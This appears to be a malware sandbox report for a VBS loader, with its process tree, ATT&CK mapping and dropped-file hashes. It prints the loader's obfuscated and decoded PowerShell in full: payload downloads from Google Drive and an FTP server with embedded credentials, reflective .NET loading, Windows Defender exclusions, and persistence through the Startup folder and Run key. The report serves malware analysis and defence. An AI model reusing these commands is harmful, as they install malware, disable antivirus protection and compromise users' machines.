QШḆЉnШḆЉCШḆЉШḆЉKwШḆЉgШḆЉFШḆЉШḆЉcШḆЉBWШḆЉGkШḆЉcwШḆЉkШḆЉCgШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉUШḆЉBwШḆЉFYШḆЉaQBzШḆЉCQШḆЉewШḆЉgШḆЉGUШḆЉcwBsШḆЉGUШḆЉfQШḆЉ7ШḆЉCШḆЉШḆЉKQШḆЉnШḆЉHgШḆЉNШḆЉBmШḆЉGgШḆЉWgBNШḆЉHcШḆЉTgШḆЉ3ШḆЉFUШḆЉZQBfШḆЉDШḆЉШḆЉXwШḆЉ1ШḆЉF8ШḆЉaQBjШḆЉHMШḆЉYgBoШḆЉDcШḆЉQwBQШḆЉDШḆЉШḆЉSQBmШḆЉFШḆЉШḆЉZШḆЉBBШḆЉDIШḆЉMQШḆЉxШḆЉCcШḆЉIШḆЉШḆЉrШḆЉCAAUABwAFYAaQBzACQAKAAgAD0AIABQAHAAVgBpAHMAJAB7ACAAKQBWAFIAQgBIAEIAJAAoACAAZgBpADsAIAApACcANAA2ACcAKABzAG4AaQBhAHQAbgBvAEMALgBFAFIAVQBUAEMARQBUAEkASABDAFIAQQBfAFIATwBTAFMARQBDAE8AUgBQADoAdgBuAGUAJAAgAD0AIABWAFIAQgBIAEIAJAA7ACcAPQBkAGkAJgBkAGEAbwBsAG4AdwBvAGQAPQB0AHIAbwBwAHgAZQA/AGMAdQAvAG0AbwBjAC4AZQBsAGcAbwBvAGcALgBlAHYAaQByAGQALwAvADoAcwBwAHQAdABoACcAIAA9ACШḆЉAUABwAFYAaQBzACQAOwApACcAdQBzAG0ALgBuAGkAdwBwAFUAXAAnACAAKwAgAHAAagBMAGoATQAkACgAIABsAGUAZAA7ACkAKABoAHQAYQBQAHAAbQBlAFQAdABlAEcAOgA6AF0AaAB0AGEAUAAuAE8ASQAuAG0AZQB0AHMAeQBTAFsAIAA9ACAAcABqAEwAagBNACQAewAgACkAdgBaAGwAYgBsACQAKAAgAGYAaQA7ACAAKQAyACgAcwBsAGEAdQBxAEUALgByAG8AagBhAE0ALgBuAG8AaQBzAHIAZQBWAC4AdABzAG8AaAAkACAAPQAgAHYAWgBsAGIAbAAkACAAOwA=';$GyXhB = $mpAQs.replace('ШḆЉ' , 'A') ;$VFuwc = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $GyXhB ) ); $VFuwc = $VFuwc[-1..-$VFuwc.Length] -join '';$VFuwc = $VFuwc.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs');powershell $VFuwc
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:552
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $lblZv = $host.Version.Major.Equals(2) ;if ($lblZv) {$MjLjp = [System.IO.Path]::GetTempPath();del ($MjLjp + '\Upwin.msu');$siVpP = 'https://drive.google.com/uc?export=download&id=';$BHBRV = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ($BHBRV) {$siVpP = ($siVpP + '112AdPfI0PC7hbsci_5_0_eU7NwMZhf4x') ;}else {$siVpP = ($siVpP + '1brj5jqnqRxCD6VhfhAn2rcVfsRo7D8gr') ;};$vurKw = (New-Object Net.WebClient);$vurKw.Encoding = [System.Text.Encoding]::UTF8;$vurKw.DownloadFile($URLKB, $MjLjp + '\Upwin.msu');$AUrGF = ('C:\Users\' + [Environment]::UserName );IzjAQ = ($MjLjp + '\Upwin.msu'); powershell.exe wusa.exe IzjAQ /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$Cslio = (New-Object Net.WebClient);$Cslio.Encoding = [System.Text.Encoding]::UTF8;$Cslio.Credentials = new-object System.Net.NetworkCredential('desckvbrat1','developerpro21578Jp@@');$lBCzSg = $Cslio.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$Cslio.dispose();$Cslio = (New-Object Net.WebClient);$Cslio.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $Cslio.DownloadString( $lBCzSg );$hzwje = 'C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs';[Byte[]] $xXzmx = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $xXzmx ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '22%80b6e83148d91b945dc23514175566ee22%=v&daolnwod=ecruos&txt.4202.80.62.dirgni72%72%8-FTUD3%A2%emanelif+B3%22%txt.4202.80.62.dirgni22%D3%emanelif+B3%tnemhcatta=noitisopsid-tnetnoc-esnopser?txt.229551bb218b-7888-d234-e861-36a46a6a/Xkm5Ru8z/smeti/moc.thgiz.ndc.0n.1rt.7p//:sptth' , $hzwje , 'true1' ) );};"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3244
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4056
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4872
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c mkdir "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\"
      4⤵
      PID:4656
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:432
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      Drops startup file
      PID:2608
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:5056
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      Drops startup file
      PID:3048
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:4360
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:2640
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:228
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:388
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:2392
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:1948
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:5084
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:2316
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:676
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:896
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:4100
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:2488
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:4424
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:1828
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:728
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:1552
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:3932
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:1056
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:1416
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:4940
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:1400
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:4552
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:4480
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:3240
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:4060
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:3744
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:3688
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:3860
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:780
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:948
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:1896
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:2248
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:5056
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:1756
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:2304
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:2896
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:680
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:2908
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:4772
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:4208
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:3040

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1

Filesize
336B

MD5
687553dedff4e8ec91f17ab0531117a5

SHA1
0629ecbf571bfe6c91fbbb47a935dbe6c1ed3e68

SHA256
de73f1b13b7d45d3ce38445309a9aef31f32bc5c6366a84fa71d6bd8738acc64

SHA512
fd705e2671d54970d75c5185dde84789c204fb946c19bfa07dbc6d8729519550b170d42de26f06386d28244d173cd22419fc647b81b48c7ac8cd1aadd0ab297d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\x2.txt

Filesize
355B

MD5
967eb55005b30c47f32376bc2bcfe01d

SHA1
4e0ef0d27139685f669c2d209517bbb76649a10e

SHA256
1b5d83bb7b160cf7af02f1fcd87dc47a851495339e98e1f3c369337c6b96a31f

SHA512
6d24c54302e9e9f3d8702037a83185279acac8fae1e93b798ad480148f63bee1a34d90c5c9a0da4c1571ed3d4b1d69033137027aac4b9ace9134f9a3a4546062

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
19e3446e5131ffc8654c075ae8beda24

SHA1
bc85831fdbfdf20f74929bbad25aeaddf8d1dfb1

SHA256
1b407adb428381b328c00a5dc3f2817cfa6a88f8d7566aea0ef2638ad05f611d

SHA512
6a190badc5d0f1b16a4b428336cf33d75a1169c526a3682611265b7f1d577632bbbd869db34f421cfb73a380dbabd539d41365921bec658746f58799bf323fc2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uos2dhsq.oll.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs

Filesize
683KB

MD5
89af3d1c013508a4c303b662082b37b5

SHA1
27c09a549b4aa399d03440fc543fc72cea662231

SHA256
84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c

SHA512
716a5bf5a788d976138dac3c7b7eb968fb4c20ec06bf45e2d0dfc99aa4f1594eb067285c2c0597999876067951627722634cc9fc243a3736e535a13c385569f6

Download Submit
memory/552-11-0x00007FFB61570000-0x00007FFB62031000-memory.dmp

Filesize
10.8MB

Download
memory/552-12-0x00007FFB61570000-0x00007FFB62031000-memory.dmp

Filesize
10.8MB

Download
memory/552-62-0x00007FFB61573000-0x00007FFB61575000-memory.dmp

Filesize
8KB

Download
memory/552-63-0x00007FFB61570000-0x00007FFB62031000-memory.dmp

Filesize
10.8MB

Download
memory/552-0-0x00007FFB61573000-0x00007FFB61575000-memory.dmp

Filesize
8KB

Download
memory/552-6-0x0000022F00030000-0x0000022F00052000-memory.dmp

Filesize
136KB

Download
memory/3244-22-0x00000174FE510000-0x00000174FE51A000-memory.dmp

Filesize
40KB

Download